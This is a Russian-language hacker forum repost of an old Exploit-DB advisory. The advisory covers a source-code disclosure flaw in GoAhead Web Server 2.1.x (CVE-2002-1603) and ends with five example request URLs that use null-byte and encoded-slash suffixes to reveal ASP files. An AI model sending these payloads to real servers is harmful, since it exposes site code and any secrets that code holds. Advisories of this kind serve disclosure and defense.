Exploit GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23446
Проверка EDB
  1. Пройдено
Автор
LUIGI AURIEMMA
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2002-1603
Дата публикации
2002-12-17
Код:
source: https://www.securityfocus.com/bid/9239/info

A vulnerability in GoAhead webserver may result in the disclosure of the source code of ASP script files. The vulnerability occurs because the application fails to sanitize HTTP requests.

An attacker can append certain characters to the end of an HTTP request for a specific ASP file. As a result, GoAhead webserver will disclose the contents of the requested ASP script file to the attacker.

This issue affects GoAhead 2.1.7 and earlier. 

http://www.example.com/asp.asp%00
http://www.example.com/asp.asp%2f
http://www.example.com/asp.asp%5c
http://www.example.com/asp.asp/
http://www.example.com/asp.asp
 
Источник
www.exploit-db.com

Похожие темы